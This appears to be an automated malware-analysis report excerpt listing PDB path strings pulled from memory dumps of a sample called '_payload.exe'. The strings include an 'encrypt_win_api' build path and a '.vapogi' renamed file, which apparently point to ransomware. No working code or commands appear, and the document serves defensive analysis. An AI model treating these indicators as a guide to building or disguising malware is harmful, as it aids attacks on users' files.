                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272328105.0000000004177000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\o**\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .LOGUser.datntkrnlmp.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ije source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268917126.0000000003D24000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270401178.00000000041F3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tate\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\& source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.vapogi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272250525.00000000042F2000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\Q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\320\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279197442.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280968571.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\OH| source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244648233.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\a\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281481363.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280272665.00000000041F3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\8 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\' source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbansferApiGroup source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288915602.0000000004171000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289842749.0000000004191000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133408907975188232.txt\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y.IE5\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280009044.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281570328.000000000429E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\Pg source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004503000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*d source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\% source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*ta\Nn< source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305033543.0000000004198000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbrogFile_October_3_2023__13_9_20.txtpol source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\V source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\N source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\b source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282207150.00000000041E3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305914874.000000000415F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\2E source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246554838.0000000003D07000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245102965.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245433373.0000000003D01000.00000004.00000020.00020000.00000000.sdmp
